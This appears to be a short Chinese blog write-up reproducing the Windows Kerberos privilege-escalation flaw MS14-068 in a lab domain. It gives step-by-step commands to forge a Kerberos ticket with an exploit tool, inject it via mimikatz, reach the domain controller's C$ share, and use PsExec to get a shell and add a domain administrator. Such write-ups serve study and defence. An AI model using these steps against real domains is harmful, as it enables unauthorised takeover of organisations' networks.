MS14-068复现

域控制器

MS14-068复现_第1张图片

漏洞利用的域用户

MS14-068复现_第2张图片


  1. 首先利用ms14-068提权工具生成伪造的kerberos协议认证证书(黄金票据)
  2. 利用mimikatz.exe将证书写入,从而提升为域管理员
  3. 测试是否能访问域控C盘目录,能访问则说明提升为域管理员
  4. 利用PsExec.exe获取域控shell,添加用户并将其加入域管理员组

直接访问域控制器的C盘目录:
MS14-068复现_第3张图片
不能访问

查看本机用户信息,记录用户名与SID号whoami /all
MS14-068复现_第4张图片

进入MS14-068目录,使用以下命令:
MS14-068.exe -u @ -p -s -d
MS14-068复现_第5张图片

打开mimikatz,注入票据

mimikatz # kerberos::purge          //清空当前凭证
mimikatz # kerberos::list           //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中

MS14-068复现_第6张图片

再次列出域控制器的C盘目录:
MS14-068复现_第7张图片

使用PSTools目录下的PsExec.exe获取shell:
MS14-068复现_第8张图片

添加域管理员
在这里插入图片描述

在这里插入图片描述

你可能感兴趣的:(MS14-068复现)